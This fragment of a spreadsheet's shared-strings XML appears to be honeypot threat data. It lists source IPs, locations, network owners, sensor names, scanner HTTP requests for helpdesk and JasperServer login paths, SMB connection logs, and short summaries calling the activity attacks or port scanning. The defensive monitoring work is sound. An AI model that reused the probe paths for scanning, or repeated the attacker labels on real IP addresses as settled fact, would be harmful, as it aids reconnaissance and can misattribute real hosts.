    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTPS_H26&amp;&amp;SMA-LAB_HTTPS_H30&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_HTTPS_H36&amp;&amp;SMA-LAB_HTTPS_H7&amp;&amp;SMA-LAB_HTTPS_H13&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_HTTPS_H46&amp;&amp;SMA-LAB_HTTPS_H28&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_HTTPS_H38&amp;&amp;SMA-LAB_HTTPS_H47&amp;&amp;SMA-LAB_HTTPS_H45&amp;&amp;SMA-LAB_HTTPS_H22&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_HTTPS_H16&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_HTTP_H10</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;80&amp;&amp;10316&amp;&amp;8443&amp;&amp;16229&amp;&amp;NA&amp;&amp;33967&amp;&amp;39498</t>
  </si>
  <si>
    <t>5128581</t>
  </si>
  <si>
    <t>10123</t>
  </si>
  <si>
    <t>40.7128</t>
  </si>
  <si>
    <t>-74.006</t>
  </si>
  <si>
    <t>ICG</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.79.122', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.118.77', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.181.21.224', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.118.77', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.8.69', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '91.194.11.82', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '45.14.244.111', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.90.63.129', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '95.164.118.29', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.181.21.224', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '193.57.138.110', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.97.67', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.116.162', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.97.67', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.37.11', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.63.23', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '95.164.21.98', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '45.14.244.111', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '95.164.21.98', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.40.123', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '203.29.241.98', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.115.66', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '95.164.118.29', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '95.164.118.29', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.118.77', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '45.14.244.111', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}</t>
  </si>
  <si>
    <t>::ffff:b9b4:8c6b</t>
  </si>
  <si>
    <t>65cddd2e81986072c5e37e8b1b39f4a6</t>
  </si>
  <si>
    <t>117.204.232.33</t>
  </si>
  <si>
    <t>::ffff:75cc:e821</t>
  </si>
  <si>
    <t>32e459e0c8baf0f7815c19f198f433ab</t>
  </si>
  <si>
    <t>77.238.104.222</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14</t>
  </si>
  <si>
    <t>43754</t>
  </si>
  <si>
    <t>Asiatech Data Transmission company</t>
  </si>
  <si>
    <t>Asiatech Data Transmission Co.</t>
  </si>
  <si>
    <t>::ffff:4dee:68de</t>
  </si>
  <si>
    <t>6192a2a80e82824af7d238a12b79ca99</t>
  </si>
  <si>
    <t>103.123.225.233</t>
  </si>
  <si>
    <t>Mumbai (Ekta Nagar)</t>
  </si>
  <si>
    <t>19.0533</t>
  </si>
  <si>
    <t>72.9378</t>
  </si>
  <si>
    <t>138296</t>
  </si>
  <si>
    <t>Juweriyah Networks Private Limited</t>
  </si>
  <si>
    <t>STARNET7</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.123.225.233,61121)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.123.225.233,50645)}</t>
  </si>
  <si>
    <t>::ffff:677b:e1e9</t>
  </si>
  <si>
    <t>An incoming SMB connection from an unknown IP address suggests a potential vulnerability scan or brute-force attack attempt.
The attacker may be trying to exploit a weakness in the system's file sharing capabilities.
This activity could be a precursor to a more serious malware infection or data theft.</t>
  </si>
  <si>
    <t>9792a5f1985f87da82338231db0dc1f1</t>
  </si>
  <si>
    <t>103.140.180.132</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H12&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_SMB_H9&amp;&amp;SMA-LAB_SMB_H4&amp;&amp;SMA-LAB_MSSQL_H39&amp;&amp;SMA-LAB_MSSQL_H8</t>
  </si>
  <si>
    <t>1433&amp;&amp;445&amp;&amp;53901&amp;&amp;53936&amp;&amp;60163</t>
  </si>
  <si>
    <t>Dhaka (Motijheel)</t>
  </si>
  <si>
    <t>1185241</t>
  </si>
  <si>
    <t>23.7299</t>
  </si>
  <si>
    <t>90.4172</t>
  </si>
  <si>
    <t>139278</t>
  </si>
  <si>
    <t>data edge limited</t>
  </si>
  <si>
    <t>2019-07-02</t>
  </si>
  <si>
    <t>DATAEDGELIMITED-BD</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,61556)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,61572)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,62009)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,57109)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,57116)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,57624)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,51217)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,51247)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,51870)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,58677)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,58729)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,59326)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,50626)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,50632)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,51137)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,60683)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,60715)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,61197)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,52153)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,63885)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,63981)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,64724)}&amp;&amp;{Data_SMB:Incoming connection (103.140.180.132,64734)}</t>
  </si>
  <si>
    <t>::ffff:678c:b484</t>
  </si>
  <si>
    <t>A malicious client is attempting to connect to a shared resource from an IP address that may be associated with malicious activity. This could be an attempt at unauthorized file sharing or data theft. The IP address and port number suggest a potential exploitation of SMB vulnerabilities. &amp;&amp; Possible malicious activity involves an unknown computer attempting to connect to a shared resource on the monitored system using a potential vulnerability or misconfiguration, possibly for unauthorized access or exploitation. This attempt may be made by a malicious entity located at IP address 103.140.180.132, likely trying to exploit a specific service or feature. The connection is being established via port 64724. &amp;&amp; An incoming connection from an unknown IP address is detected for a potentially vulnerable SMB service.
This could be a sign of a potential scanning or probing activity for vulnerabilities.
Further investigation is required to determine the intent behind this connection. &amp;&amp; An incoming connection is attempted from an IP address attempting to access shared resources on the system. This may be a probing activity or the start of unauthorized file transfer. The client's identity and purpose are unknown at this point.</t>
  </si>
  <si>
    <t>SMB Attack &amp;&amp; Port Scanning</t>
  </si>
  <si>
    <t>5ff6266f661c434d169c29eba6af58f1</t>
  </si>
  <si>
    <t>210.99.106.177</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22</t>
  </si>
  <si>
